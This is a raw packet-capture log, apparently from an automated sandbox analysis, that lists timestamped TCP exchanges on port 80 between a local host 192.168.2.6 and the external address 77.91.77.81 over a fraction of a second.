Jul 3, 2024 18:08:46.592782021 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.592792988 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.592844963 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.592845917 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.592864990 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.592876911 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.592876911 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.592889071 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.592900991 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.592905998 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.592916965 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.592931986 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.592950106 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.593031883 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.593065023 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.593143940 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.593161106 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.593173981 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.593178988 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.593185902 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.593192101 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.593200922 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.593204021 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.593216896 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.593218088 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.593229055 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.593235016 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.593252897 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.593269110 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628293991 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628309011 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628319979 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628335953 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628353119 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628385067 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628395081 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628395081 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628396988 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628420115 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628437996 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628500938 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628513098 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628524065 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628535032 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628535032 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628545046 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628551006 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628571033 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628602028 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628654957 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628668070 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628679991 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628686905 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628691912 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628705978 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628732920 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628861904 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628874063 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628885031 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628895998 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628901958 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628907919 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628918886 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628925085 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628931046 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628942966 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628950119 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628954887 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628966093 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.628973007 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.628989935 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629012108 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629081964 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629117012 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629158020 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629183054 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629199028 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629200935 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629215956 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629218102 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629230022 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629245996 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629298925 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629329920 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629333973 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629342079 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629354000 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629363060 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629365921 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629379034 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629394054 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629585981 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629597902 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629609108 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629621029 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629626989 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629637003 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629642963 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629663944 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629666090 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629677057 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629682064 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629688025 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629699945 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.629700899 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629709005 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.629728079 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633116007 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633155107 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633168936 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633181095 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633208990 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633228064 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633313894 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633326054 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633347988 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633363962 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633434057 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633445978 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633456945 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633469105 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633471966 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633481026 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633487940 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633492947 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633503914 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633517027 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633522987 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633538008 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633560896 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633591890 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633605003 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633625984 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633647919 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633713961 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633727074 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633738995 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633745909 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633749962 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633763075 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633764982 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633774042 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633790016 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633790970 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633804083 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633811951 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633816004 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633827925 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633840084 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633841038 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633851051 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633857965 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633863926 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633872986 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633897066 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.633985996 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.633997917 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634018898 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634027958 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634041071 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634043932 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634051085 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634057045 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634064913 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634073973 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634089947 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634107113 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634322882 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634335995 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634346008 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634351969 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634357929 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634362936 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634362936 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634370089 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634375095 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634380102 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634392023 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634406090 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634417057 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634432077 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634438992 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634443998 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634466887 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634484053 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634624958 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634648085 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634660959 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634663105 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634675026 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.634685040 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634695053 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.634715080 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683296919 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683334112 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683351040 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683352947 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683366060 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683378935 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683392048 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683434010 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683617115 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683635950 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683650970 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683657885 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683665037 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683667898 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683675051 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683681965 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683687925 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683698893 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683759928 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683784962 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683785915 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683795929 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683798075 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683809996 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683818102 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683823109 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.683832884 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683847904 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.683862925 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.684029102 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.684041977 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.684053898 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.684063911 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.684065104 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.684077978 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.684078932 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.684098959 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.684124947 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.718765020 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.718817949 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.718820095 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.718832016 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.718863964 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.718872070 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.718947887 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.718960047 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.718974113 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.718981981 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719005108 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719043970 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719058037 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719080925 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719082117 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719103098 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719114065 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719114065 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719118118 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719136953 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719147921 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719153881 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719160080 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719172001 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719180107 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719185114 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719196081 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719197989 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719223976 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719362974 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719383001 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719397068 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719408989 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719430923 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719517946 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719546080 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719554901 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719559908 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719571114 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719580889 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719583035 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719593048 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719607115 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719624043 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719649076 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719671965 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719680071 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719702959 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719727993 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719738960 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719755888 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719773054 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719841957 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719855070 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719867945 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719876051 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719890118 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719904900 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719906092 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.719938040 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.719989061 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720017910 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720021963 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720031023 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720047951 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720057964 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720128059 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720139027 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720149994 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720160007 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720163107 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720171928 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720175982 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720187902 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720187902 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720206022 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720231056 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720371962 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720385075 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720411062 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720412016 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720421076 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720422029 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720434904 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.720448017 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720457077 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.720477104 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.723799944 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.723812103 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.723824978 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.723836899 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.723850012 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.723877907 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.723912954 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.723925114 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.723937035 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.723936081 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.723947048 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.723949909 CEST	80	62915	77.91.77.81	192.168.2.6
Jul 3, 2024 18:08:46.723959923 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.723978043 CEST	62915	80	192.168.2.6	77.91.77.81
Jul 3, 2024 18:08:46.724021912 CEST	80	62915	77.91.77.81	192.168.2.6
